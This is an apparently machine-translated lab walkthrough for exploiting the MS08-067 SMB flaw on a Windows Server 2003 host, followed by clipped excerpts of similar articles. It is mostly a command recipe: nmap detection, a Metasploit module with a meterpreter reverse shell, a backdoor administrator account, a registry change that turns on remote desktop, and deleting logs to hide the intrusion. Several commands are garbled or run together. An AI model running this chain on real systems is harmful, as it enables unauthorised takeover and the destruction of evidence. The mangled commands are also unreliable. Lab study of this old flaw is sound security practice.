tags: Vulnerability linux Security hole
Vulnerability introduction: If the user receives a special RPC request on the affected system, the vulnerability may allow remote execution code. At Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, attackers may run any code without authentication.
lab environment:
Kali : 192.168.228.128
Win sever 2003 : 192.168.228.131

,nmap -n -p445 --script smb-vuln-ms08-067 192.168.0.116 --open (Here NMAP is 7.4))
service postgresql startmsconsolesearch ms08-067
use exploit/windwos/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhost 192.168.228.131set lhost 192.168.228.128
show targets
set target 10

Create User Net User Test 123 / Add

Proposal: net localgroup administrators test /add

Delete the original user group: NET localgroup users test / del

View User Net User Test

Intrusion
Open in the run: MSTSC, remote link target,

Log in to users who have created

Return to delete users

Delete log

If the target machine is closed, the remote service needs to be executed in the shell:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: various versions of Windows 2000/XP/Server 2003/Vista/Server 2008, and even Windows 7 Pro-Beta in...
This vulnerability of ms08-067 is one of the most basic vulnerabilities when we are learning msf. Many tutorials will mention this vulnerability, but this vulnerability is very picky about the reprodu...
The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability." If a user receives a specially crafted RPC request on an affected system, t...
#windowsxpsp3 system MS08-067 vulnerability test Vulnerability description The full name of the MS08-067 vulnerability is "Windows Server Service RPC Request Buffer Overflow Vulnerability". ...
lab environment kali linux2.0 win-xp sp3 Steps 1. Execute in the Kali Linux command line 2. Query MS08067 Vulnerability 3. Using Exploit / Windows / SMB / MS08_067_Netapi and view Options 4. Using Pay...
ms08-067 introduction The MS08-067 vulnerability will affect all Windows systems except Windows Server 2008 Core, including: Windows 2000/XP/Server 2003/Vista/Server 2008 versions, and even Windows 7 ...
MS08-067 Remote Overflow Vulnerability Brief description of the vulnerability principle The attacker uses the default open SMB service port 445 of the victim host to send a special RPC (Remote ...
1. Find ms08-067: 2. Use: 3. Select the payload: (At the beginning, there is a difference between windows / shell / ... and windows / meterpreter / reverse_tpc) 4. View options (yes is required): 5. E...
0x01 experimental environment Attack machine: kali linux ip:10.10.10.131 Target machine: windows server 2003 ip:10.10.10.130 0x02 configure exploit msf > use exploit/windows/smb/ms08_067_netapi&nbs...
Articles directory Foreword Introduction Second, influence Third, vulnerability harm Fourth, local reproduction Five, patch number 6. Windows Server 2003 SP2 Chinese version Utilization method 7. Deep...